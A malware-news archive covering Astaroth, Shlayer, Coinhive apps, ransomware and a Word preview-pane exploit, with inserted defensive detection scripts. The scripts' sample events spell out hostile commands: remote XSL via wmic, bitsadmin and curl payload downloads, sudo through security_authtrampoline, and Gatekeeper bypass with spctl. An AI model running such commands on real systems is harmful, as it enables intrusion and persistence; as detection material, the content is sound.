Category Archives: Malware

Astaroth Trojan relies on legitimate os and antivirus processes to steal data

A new Astaroth Trojan campaign spotted by Cybereason’s Nocturnus team is targeting Brazil and European countries.

Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.

“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as keystate information and clipboard usage.” reads the analysis published by Cybereason.

The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effective at evading antivirus software.

The new strain analyzed by Cybereason leverages the BITSAdmin and WMIC utilities to connect to the command and control infrastructure and download malicious payloads.

BITSAdmin is a command-line tool that can be used to create download or upload jobs and monitor their progress.

This Astaroth Trojan is distributed through spam campaigns; the malicious messages either carry a .7zip file as an attachment or include a hyperlink that points to the archive.

The .7zip archive contains a .lnk file which will instantiate a wmic.exe process that will “initialize an XSL Script Processing attack.”

The malware uses BITSAdmin to fetch a payload from another Command and Control server; this malicious code is disguised as images or as files without an extension and contains the various Astaroth modules.
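Detection logic for the LOLbin chain described above (a wmic.exe invocation that loads a remote XSL stylesheet, followed by a bitsadmin.exe download), written as an added example for defenders; it is not Cybereason's code, and the event format, host names and TEST-NET URLs in the sample events are constructed:

```python
"""Flag wmic.exe XSL script processing and bitsadmin.exe downloads in
process-creation telemetry, then raise the severity when both occur on
the same host.  Added example; the events below are constructed."""
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "wmic.exe",
     "cmdline": 'wmic.exe os get /format:"http://203.0.113.10/x.xsl"'},
    {"host": "ws01", "parent": "wmic.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high "
                "http://203.0.113.10/img01 C:\\Users\\Public\\img01"},
    {"host": "ws02", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": "wmic.exe computersystem get name /format:list"},
    {"host": "ws03", "parent": "svchost.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
]

FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)', re.IGNORECASE)
URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def is_xsl_script_processing(cmdline: str) -> bool:
    """wmic /format: normally names a built-in style such as list or csv.
    A URL, or an explicit .xsl path, means an attacker-supplied stylesheet
    whose embedded script wmic will execute (review any .xsl hit manually;
    legitimate admin scripts occasionally reference custom stylesheets)."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return False
    target = m.group(1)
    return bool(URL_RE.match(target)) or target.lower().endswith(".xsl")


def is_bitsadmin_download(cmdline: str) -> bool:
    """A bitsadmin transfer job that pulls from an http(s) origin."""
    lowered = cmdline.lower()
    return "/transfer" in lowered and re.search(r"https?://", lowered) is not None


def detect(events):
    """Return per-event findings plus a high-severity chain finding for any
    host on which both LOLbin behaviours were observed."""
    findings = []
    rules_per_host = defaultdict(set)
    for ev in events:
        image = ev["image"].lower()
        if image == "wmic.exe" and is_xsl_script_processing(ev["cmdline"]):
            rule = "wmic_xsl_script_processing"
        elif image == "bitsadmin.exe" and is_bitsadmin_download(ev["cmdline"]):
            rule = "bitsadmin_download"
        else:
            continue
        rules_per_host[ev["host"]].add(rule)
        findings.append({"host": ev["host"], "rule": rule,
                         "severity": "medium", "cmdline": ev["cmdline"]})
    for host, rules in rules_per_host.items():
        if {"wmic_xsl_script_processing", "bitsadmin_download"} <= rules:
            findings.append({"host": host, "rule": "lolbin_download_chain",
                             "severity": "high", "cmdline": None})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"], f["host"], f["rule"], f["cmdline"] or "")
```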


The malware also injects a malicious module into aswrundll.exe, the Avast Software Runtime Dynamic Link Library used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.

The choice of Avast is effective because the Avast engine is the most common antivirus in the world. Avast pointed out that this is neither an injection nor a privilege escalation: attackers are using an Avast file to run a binary in much the same way that Windows’ rundll32.exe can run a DLL. Avast has issued a detection for the malware and plans to change its environment to ensure the same process cannot be misused in this way in the future.

The Astaroth Trojan sample analyzed by the experts also exploits the unins000.exe process of a security solution developed by GAS Tecnologia.

The malware is able to log the users’ keystrokes, collect information through hooking, access clipboard content, and monitor the keystate.

The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords of mail accounts on an Exchange server stored by Microsoft Outlook, and passwords of MSN Messenger and Windows Messenger accounts.

“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above.” concludes Cybereason.

“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”

Pierluigi Paganini

(SecurityAffairs – Astaroth Trojan, hacking)

The post Astaroth Trojan relies on legitimate os and antivirus processes to steal data appeared first on Security Affairs.

What is Ransomware and How to Prevent It?

By Zohar Pinhasi

The threat of ransomware attack is growing but do you know what is ransomware and how you can protect yourself from this growing threat? If you’ve been following the news on malware scams and hacks from across the world, chances are that you might have come across the term ‘ransomware’. It’s deemed as the biggest […]

This is a post from HackRead.com. Read the original post: What is Ransomware and How to Prevent It?

Cryptojacking Coinhive Miners for the first time found on the Microsoft Store

Symantec discovered eight potentially unwanted applications (PUAs) in the Microsoft Store that were dropping cryptojacking Coinhive miners.

Security experts at Symantec have discovered eight potentially unwanted applications (PUAs) in the Microsoft Store that were dropping cryptojacking Coinhive miners.

The removed apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.


The malicious Monero (XMR) Coinhive cryptomining scripts were delivered via Google’s legitimate Google Tag Manager (GTM) library.

The GTM tag management system allows developers to inject JavaScript and HTML content within their apps for tracking and analytics purposes.

“Users may get introduced to these apps through the top free apps lists on the Microsoft Store or through keyword search. The samples we found run on Windows 10, including Windows 10 S Mode.” reads the analysis published by Symantec.

“As soon as the apps are downloaded and launched, they fetch a coin-mining JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. The mining script then gets activated and begins using the majority of the computer’s CPU cycles to mine Monero for the operators.”

The malicious apps were added to the Microsoft Store between April and December 2018.

Unlike Google Play, the Microsoft Store doesn’t share download counts, but experts pointed out that the apps have a large number of fake ratings; almost 1,900 ratings were posted for these applications.

Once one of the apps is downloaded and launched, it fetches a cryptojacking JavaScript library by triggering Google Tag Manager (GTM) on the operators’ domain servers. The mining script is then activated and starts abusing the device’s resources to mine Monero cryptocurrency.

After inspecting the network traffic between the apps and their command-and-control servers, Symantec found that they were using a variant of the JavaScript-based Coinhive miner script, a well-known tool used by threat actors in cryptojacking campaigns since its launch in September 2017.

The analysis of the network traffic associated with the apps allowed the researchers to find the hosting server for each app. All the servers have the same origin, so the apps were likely published by the same developers under different names.

Symantec provided the following recommendations to mitigate the threat:

  • Keep your software up to date.
  • Do not download apps from unfamiliar sites.
  • Only install apps from trusted sources.
  • Pay close attention to the permissions requested by apps.
  • Pay close attention to CPU and memory usage of your computer or device.
  • Install a suitable security app, such as Norton or Symantec Endpoint Protection, to protect your device and data.
  • Make frequent backups of important data.

Pierluigi Paganini

(SecurityAffairs – cryptojacking Coinhive miners, malware)

The post Cryptojacking Coinhive Miners for the first time found on the Microsoft Store appeared first on Security Affairs.

Ransomware in City Hall


In 2018, the undisputed star in a cybercriminal’s arsenal was cryptojacking. Nevertheless, the use of other kinds of malicious software is still booming in such relevant sectors as public administration. Ransomware is still one of the most popular cyberthreats among criminals, due to how easy it is to implement, how lucrative it can be, and how efficient it is at getting results. And it is already making waves in 2019.

City officials in the city of Del Rio, Texas, reported a ransomware attack at the start of January that affected their systems and forced them to carry out their administrative tasks manually, with pen and paper. Del Rio’s Management Information Services were obliged to disconnect City Hall’s computers to keep employees from accessing the system and spreading the infection.

According to US media outlets, the attack was carried out using an unusual strategy. The ransom note included a phone number to communicate with the attackers and get instructions as to how to pay to recover their files; the usual course of action for attackers in these situations is to provide an email address for the victim to use if they need more information about decrypting their infected devices.

The City has revealed very few technical details about the attack: the ransom demanded by the attacker, the specific strain of ransomware used in the attack, and the person or group responsible for the attack are all unknown. Nevertheless, along with the cost of recovering their computers, the attack caused a major loss of productivity, and seriously slowed down their workflow.

Other public sector attacks

This is not the first time that a city hall or public administration has been affected by ransomware. In April 2018, the city of Atlanta spent over $2.6 million to recover from a ransomware attack that paralyzed the city government’s operations. With this budget, the city had to pay for incident response services, digital forensic analysis, Microsoft Cloud experts, and staff to help with systems recovery, as well as crisis communication services.

In July, Matanuska-Susitna, a borough in the state of Alaska, was also hit by several types of advanced malware, bringing down its IT infrastructure, affecting computers, servers, and telephones, and paralyzing email communication. In this case, the borough was attacked with advanced persistent threats, with strains such as the Trojan Emotet and the ransomware BitPaymer. Officials in the borough estimated the cost of restoring servers and systems after the attacks to be over $2 million. It is quite clear that this kind of threat has an almost limitless capacity to endanger all sectors, from private companies to public institutions. This is why it is so important to try to avoid these risks and be able to identify threats in a timely manner.

How to make public administration malware-free

Cybersecurity solutions are vital in the fight to keep ransomware out of public sector systems, and it is important to try to implement them before an attack happens. Heads of security also have a duty to ensure that all employees in these institutions understand the risks and the large scale consequences of such apparently harmless actions as opening an email or clicking on a link. This can be done by carrying out awareness programs, and by training employees.

The most relevant tips for preventing a ransomware attack – making backups, updating software and devices – apply to any kind of sector, including public administration. However, measures such as an efficient incident response plan and complementing internal IT services with the experience and support of third parties can reduce the impact caused by cybercriminals, and help professionals in the race against the clock. Advanced cybersecurity solutions such as Adaptive Defense combine prevention, detection and response to the threats posed by malware. With the necessary support, both private companies and public and government institutions can stop cyberattacks from holding their computers to ransom and forcing them to have to go back to the days of pen, paper, and typewriters.

The post Ransomware in City Hall appeared first on Panda Security Mediacenter.

Blog | Avast EN: Windows Malware for Macs and More Weekly News | Avast

Phishing scam has fishy URLs

There’s a phishing campaign afoot that tries scamming users into believing their email accounts have been compromised. The phishing email claims multiple verification errors have caused the users’ accounts to be blacklisted and the only fix is an immediate login with the proper credentials. The email provides a link that reads CONFIRM YOUR EMAIL, and when users click on it, they are taken to a fake login page based on their particular email service. If they enter their credentials, the info is sent back to the malware’s C&C (command-and-control server).

Blog | Avast EN

Astaroth Trojan Exploits Antivirus Software

The Astaroth Trojan steals credentials and other user data through antivirus software, Avast, and services. It sends scam campaigns with

Astaroth Trojan Exploits Antivirus Software on Latest Hacking News.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime, delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Experts spotted a new strain of Shlayer macOS Malware

Security experts at Carbon Black have recently discovered a new strain of the Shlayer malware that targets macOS versions.

Security experts at Carbon Black have recently spotted a new strain of the Shlayer malware that targets macOS versions from 10.10.5 up to 10.14.3.

The malware poses as an Adobe Flash update and was distributed through a large number of websites, both fake domains and compromised legitimate ones.


“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.

“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites.”

This variant of the Shlayer malware employs multiple levels of obfuscation; the experts also discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware uses legitimate system applications via bash to conduct all installation activity.

Once the installer is launched, a .command script is executed from a hidden directory in the mounted volume. The base64-encoded script is decoded and AES-decrypted, revealing a second script, which in turn contains another encoded script that is subsequently executed.

The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using uuidgen, creates a custom URL using the harvested data, and then downloads the second stage payload. 

The malicious script attempts to download the password-protected ZIP file using curl, and creates a directory in /tmp to store the ZIP file and unzip it. 

The script also makes the binary within the unzipped .app executable using chmod +x, runs the payload with specific arguments, and finally runs killall Terminal to close the running script’s terminal window.

The second stage malware attempts to escalate privileges with sudo using a technique that invokes /usr/libexec/security_authtrampoline.

“After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline as discussed in Patrick Wardle’s DEFCON 2017 talk “Death by 1000 Installers”.” continues the analysis.

“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl.”

With this technique it is possible to run whitelisted software without user intervention even if the system is set to disallow unknown applications downloaded from the internet. 
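The installation chain just described is a sequence rather than a single event, so a useful detection correlates process launches per session in the order the stages are expected to run. The following is an added example for defenders, not Carbon Black's code; the event format, session ids, paths and TEST-NET URL in the sample events are constructed:

```python
"""Ordered-stage correlation for the Shlayer-style macOS install chain:
.command script from a hidden directory on a mounted volume, curl into
/tmp, chmod +x on the unpacked app, sudo via security_authtrampoline,
and spctl changes to Gatekeeper.  Added example; events are constructed."""
import re
from collections import defaultdict

# Constructed process-launch events: (session, sequence number, command line).
SAMPLE_EVENTS = [
    ("s1", 1, "/bin/bash /Volumes/Install/.hidden/Install.command"),
    ("s1", 2, "uuidgen"),
    ("s1", 3, "curl -s -o /tmp/abc123/payload.zip https://203.0.113.20/d"),
    ("s1", 4, "unzip -P p4ss /tmp/abc123/payload.zip -d /tmp/abc123"),
    ("s1", 5, "chmod +x /tmp/abc123/Player.app/Contents/MacOS/Player"),
    ("s1", 6, "killall Terminal"),
    ("s1", 7, "sudo /usr/libexec/security_authtrampoline "
              "/tmp/abc123/Player.app/Contents/MacOS/Player"),
    ("s1", 8, "spctl --add /tmp/abc123/Extra.app"),
    # A developer fetching a tarball into /tmp shares two stages but not the chain.
    ("s2", 1, "curl -o /tmp/tool.tar.gz https://example.org/tool.tar.gz"),
    ("s2", 2, "tar xzf /tmp/tool.tar.gz -C /tmp"),
    ("s2", 3, "chmod +x /tmp/tool/bin/tool"),
]

# Stages in the order the chain executes them; each is a regex on the command line.
STAGES = [
    ("hidden_command_script", re.compile(r"/Volumes/.*/\.[^/]+/.*\.command")),
    ("curl_to_tmp",           re.compile(r"^curl\b.*\s-o\s+/tmp/")),
    ("chmod_x_tmp",           re.compile(r"^chmod\s+\+x\s+/tmp/")),
    ("authtrampoline_sudo",   re.compile(r"security_authtrampoline")),
    ("spctl_gatekeeper",      re.compile(r"^spctl\s+(--add|--master-disable|--disable)")),
]


def match_chain(cmdlines):
    """Greedy subsequence match: return the stage names observed in the
    expected order.  A stage seen out of order is not counted, which keeps
    unrelated curl/chmod activity from lining up with the chain."""
    matched, pos = [], 0
    for name, pattern in STAGES:
        for i in range(pos, len(cmdlines)):
            if pattern.search(cmdlines[i]):
                matched.append(name)
                pos = i + 1
                break
    return matched


def assess(events):
    """Group events by session, sort by sequence number and score each
    session: 4+ ordered stages is high confidence, 2-3 low, otherwise none."""
    by_session = defaultdict(list)
    for session, seq, cmd in events:
        by_session[session].append((seq, cmd))
    results = {}
    for session, items in by_session.items():
        cmds = [cmd for _, cmd in sorted(items)]
        stages = match_chain(cmds)
        if len(stages) >= 4:
            verdict = "high"
        elif len(stages) >= 2:
            verdict = "low"
        else:
            verdict = "none"
        results[session] = {"verdict": verdict, "stages": stages}
    return results


if __name__ == "__main__":
    for session, r in assess(SAMPLE_EVENTS).items():
        print(session, r["verdict"], "->", ", ".join(r["stages"]))
```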

Carbon Black’s analysis includes Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Shlayer, hacking)

The post Experts spotted a new strain of Shlayer macOS Malware appeared first on Security Affairs.

Google Play Store Malicious App Detection Up By Over 50%

In Google’s mid-year review which was announced on Wednesday, they said that Google Play Store app rejections went up 55%

Google Play Store Malicious App Detection Up By Over 50% on Latest Hacking News.

Hacked versions of popular iOS games available on App Store

By Waqas

Software pirates are distributing hacked and infected versions of iPhone apps by hijacking Apple’s enterprise developer program. Reportedly, the hacked apps include versions of Minecraft, Spotify, Angry Birds, and Pokemon Go. These apps have been modified for making paid content/features available for free to deprive the original developers and Apple of their due revenue share […]

This is a post from HackRead.com. Read the original post: Hacked versions of popular iOS games available on App Store

Organizations Continue to Fail at IoT Security, and the Consequences Are Growing

The internet of things (IoT) is taking over the world — or, at least, it seems that way. According to Gartner, we can expect more than 20 billion connected IoT devices by 2020, up from just shy of 9 billion devices in 2017.

Yet as the IoT takes over the world, IoT security remains, well, pitiful. Connected devices emerged as one of the biggest attack vectors of 2018. While organizations are finally recognizing that the IoT is a threat to their overall cybersecurity, they are failing to ensure that the networks and data generated by IoT devices remain protected.

You Can’t Protect What You Can’t See

One reason why the IoT became one of the biggest attack vectors of 2018 was its invisibility on enterprise networks. According to a report from Gemalto, 48 percent of businesses admitted they are unable to detect the devices on their network. However, consumers expect businesses to have a handle on IoT security. It’s become a sort of paradox for businesses: They have to protect what they cannot see on their networks.

At the same time, IoT vendors are failing on their end by not developing devices and software with security built in — nor do they have to because there aren’t security standards for the IoT.

“Consider the operating systems for such appliances,” wrote Nick Ismail for Information Age. “How do you upgrade the OS in a wall-mounted air conditioning unit that’s connected wirelessly? Or a smart light bulb? If you can’t upgrade an operating system, how can you attempt to patch any vulnerabilities?”

That’s why cybercriminals are specifically targeting IoT devices. Their security is weak on the device/software side as well as on the network side because organizations struggle to account for all of their connected devices.

In 2018, favorite targets for threat actors included routers and firewalls. The United States Computer Emergency Readiness Team (US-CERT) put out a warning last spring that attackers were going after network devices, saying that if they can own the router, they’ll also take charge of the traffic. The alert added that a “malicious actor with presence on an organization’s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts.” Legacy systems or systems that are never updated are low-hanging fruit for the picking.

Attacks Against Connected IoT Devices

Cybercriminals know that IoT connections and devices are easy targets, which is why experts warn that we will see an uptick in the number of specifically targeted attacks in the coming years. One example is a rise in malware that targets the medical industry, and not just medical devices themselves, but all of the IoT devices found in hospitals, such as heating, ventilation and air conditioning (HVAC) systems or wireless printers.

Threat actors are also utilizing ransomware for their IoT-based attacks. Ransomware attacks against the IoT aren’t the same as the attacks against your internal network. With an attack on a computer or server, ransomware is able to lock down your data directly. With the IoT, the data itself is in the cloud and the device can easily be rebooted, which means you won’t need to pay the ransom — that’s a lose-lose for the attacker.

Instead, ransomware attacks against the IoT are timed to hit at a critical moment, acting like a distributed denial-of-service (DDoS) attack. The ransomware will take down the device when it can’t be reset, or it takes over the system itself. For example, a ransomware attack could take over a building’s HVAC system late at night on a holiday weekend, turning the air conditioning on high until the ransom is paid.

We’ve also seen how malware can turn IoT devices into botnets and affect the functionality of other networks and devices. These botnets are expected to evolve unless IoT security improves.

IoT Security Solutions for Vendors and Organizations

IoT security is expected to gain a higher profile in 2019. Security experts predict more attacks against IoT infrastructure, more malware targeted directly at these devices and just more endpoints to defend. This means that 2019 should be the year that everyone, from vendors to organizational security teams, invest in their security approach and solutions.

On the software side, security is primarily in vendors’ hands. With greater emphasis and awareness of DevSecOps, we should expect to see a bigger push to bake security directly into devices. New privacy laws across the U.S. will also force manufacturers to give users greater control; for example, California passed a law to ban default passwords on new devices by 2020 and ensure each device has security measures built in.

On the organizational side, security teams can introduce advanced tools such as nano agents and fog computing, which allow for microsegmentation of individual devices. Fog computing is a layer between the device and the cloud, allowing for real-time monitoring of the devices, especially highly critical ones where a cyber incident could be the difference between life and death. While perhaps further off in the future, nano agents can be embedded directly into individual devices to monitor cyber risk.

The internet of things is taking over the world — and so will cybercriminals if we don’t address the security problems surrounding these devices.

The post Organizations Continue to Fail at IoT Security, and the Consequences Are Growing appeared first on Security Intelligence.

Adventures of Cyber Security Monitoring During 2018 U.S. Midterm Elections

With all the Russian election hacking scandals in the news during and after the 2016 Presidential election, curiosity consumed me to architect and run an experiment to see if I could monitor changes in the threat landscape in either Moscow, Russia or Washington D.C. during the 2018 U.S. midterm elections. I have worked in four […]… Read More

The post Adventures of Cyber Security Monitoring During 2018 U.S. Midterm Elections appeared first on The State of Security.

Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises

Along with Emotet, Trickbot has become one of the most versatile and dangerous pieces of modular malware hitting enterprise environments. Most recently, its creators have added another dangerous module to it, which allows it to extract and exfiltrate credentials from popular remote access software. Trickbot’s evolution Like Emotet, Trickbot started as a pure banking Trojan but was slowly developed through the years and now has many more additional capabilities. It can: Achieve persistence (through scheduled … More

The post Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises appeared first on Help Net Security.

Most wanted malware in January 2019: A new threat speaks up

Check Point’s Global Threat Index for January 2019 reveals a new backdoor Trojan affecting Linux servers, which is distributing the XMRig crypto-miner. The new malware, dubbed SpeakUp, is capable of delivering any payload and executing it on compromised machines. The new Trojan currently evades all security vendors’ anti-virus software. It has been propagated through a series of exploitations based on commands it receives from its control center, including the 8th most popular exploited vulnerability, “Command … More

The post Most wanted malware in January 2019: A new threat speaks up appeared first on Help Net Security.

Bromium: Preview Pain: Malware Triggers in Outlook Preview Without User Opening Word Document

A recent malware sample forwarded to our Threat Intelligence service had some very interesting properties which we think would be useful to share. The sample itself is a Word document which is emailed as part of a phishing attack. If the user interacts with the document, it would download a payload to run on the user’s machine. So far, nothing particularly unusual, this infection route is de rigueur and the Bromium blog contains many recent examples, including my write-up on an Emotet campaign and Mathew Rowen’s excellent post.

There are three reasons why this specific sample is somewhat unusual. Firstly, the user does not have to open the document for the malware to trigger. Secondly, it still works if the file is marked with an ADS security Zone identifier of 3 (meaning the file is known to come from an untrustworthy location). And finally, it successfully avoids having the payload it downloads scanned by some AV APIs. In this blog I intend to cover the first two issues, and there will be a follow-up post in a few days to cover the final part of the attack.

For those that wish to dig a little deeper, the hash for the malicious document is:

  • 3FEA120D39B1F0B63DC6A73D0EE2D197169FC765DD5B1EAFC5658C6799D4B00F

How do you get infected without opening the document?

Short answer is—document preview! When you highlight a document in Windows Explorer or Outlook, there is a Preview pane on the right-hand side (or below, depending on your preferences) that gives you a small image of what the document looks like. This is a convenient usability feature, but it has issues from a security perspective—in order to create the image, the content of the document needs to be parsed. Microsoft has generally done a good job of securing this. For example, all the macros will be switched off, and we rarely see attacks that are triggered in the preview.

PowerShell is executing inside the Explorer Preview pane

This attack triggered when the document was highlighted and opened in the Windows Explorer Preview on my corporate laptop (yes, I run malware on my work laptop, but it’s safely isolated within a uVM). Since macro support in the preview is disabled, it leads us to the conclusion that this attack is not using a macro within Word itself, which is indeed unusual. From the above image, you can notice that PowerShell is executing inside the Explorer Preview pane, which is not something we see often.

This same executable is used for the preview of attachments in Outlook, and it results in the same behaviour. If Outlook loads the attachment in the Office Preview, the attack will run. The user never needs to open the attachment directly.

How did the bad guys manage that?


As expected, the document does not contain a macro. Instead, it makes use of a feature of the RTF document format that allows embedding an Excel object and forcing it to update with “\objupdate”. The document contains five embedded Excel workbooks in the footer, each holding some base64-encoded text in cell G135 (see image above). The embedded workbook itself does contain a macro that runs when Excel opens it, which in turn reads the content of cell G135 and converts that text into the script to run in PowerShell. This results in a child Excel instance that isn’t running in the same security state as the preview process that launched it, which in turn gives the attacker the ability to launch PowerShell.
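A defender-side check for the document structure described above, added here as an illustration and not Bromium’s tooling: it walks the RTF control words, lists every embedded `\object` group with its `\objclass`, and flags Excel objects carrying `\objupdate`, which is the combination this sample relies on. The RTF below is constructed inline (the `\objdata` hex is a placeholder, not a real OLE stream).

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class EmbeddedObject:
    obj_class: Optional[str]   # value of \objclass, e.g. "Excel.Sheet.12"
    auto_update: bool          # \objupdate present: Word instantiates the object on render
    data_len: int              # decoded size of the \objdata payload, in bytes


# Constructed sample, not the real malicious document: a footer holding one Excel
# workbook marked \objupdate and one ordinary embedded package. The \objdata hex
# is a placeholder, not an actual OLE stream.
SAMPLE_RTF = rb"""{\rtf1\ansi
{\footer {\object\objemb\objupdate{\*\objclass Excel.Sheet.12}{\*\objdata 0105000002000000}}
{\object\objemb{\*\objclass Package}{\*\objdata 0102}}\par}
\par Body text.}"""

CLASS_RE = re.compile(rb"\\objclass\s+([^}\\]+)")
DATA_RE = re.compile(rb"\\objdata\s+([0-9A-Fa-f\s]+)")


def find_groups(rtf: bytes, keyword: bytes):
    r"""Yield every RTF group that starts with "{" + keyword, with balanced braces.
    Escaped characters (\{, \}, \\) are skipped so they do not disturb the count."""
    i = 0
    while True:
        start = rtf.find(b"{" + keyword, i)
        if start == -1:
            return
        depth, j = 0, start
        while j < len(rtf):
            c = rtf[j:j + 1]
            if c == b"\\":
                j += 2          # skip the escaped character
                continue
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        yield rtf[start:j + 1]
        i = j + 1


def scan_rtf(rtf: bytes) -> List[EmbeddedObject]:
    r"""List every \object group in the document with its class and update flag."""
    found = []
    for group in find_groups(rtf, b"\\object"):
        cls = CLASS_RE.search(group)
        data = DATA_RE.search(group)
        hexdata = re.sub(rb"\s", b"", data.group(1)) if data else b""
        found.append(EmbeddedObject(
            obj_class=cls.group(1).strip().decode("latin-1") if cls else None,
            auto_update=b"\\objupdate" in group,
            data_len=len(hexdata) // 2,
        ))
    return found


def auto_updating_excel(objects: List[EmbeddedObject]) -> List[EmbeddedObject]:
    """The pattern from this sample: an Excel object that the document forces to
    update, so it is instantiated (and its workbook macro offered) on preview."""
    return [o for o in objects if o.auto_update and (o.obj_class or "").startswith("Excel")]
```

Run over a real document the counts tell you how many objects are embedded and which of them Word will instantiate without a click; a footer full of auto-updating Excel objects is the signature of this sample.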

Without Bromium Secure Platform installed on my machine, my experience would have been a little different, since the various spawned processes of the malware would not be contained in the VM, allowing them to be seen more easily. The difference in user experience is that once the Office Preview loads the Word document, an Excel workbook would unexpectedly open on the machine in the foreground. This looks to be an oversight in the document preview code in Microsoft Office, as it is neither a good user experience, nor a desirable behaviour from a security point of view.

Mark of the web

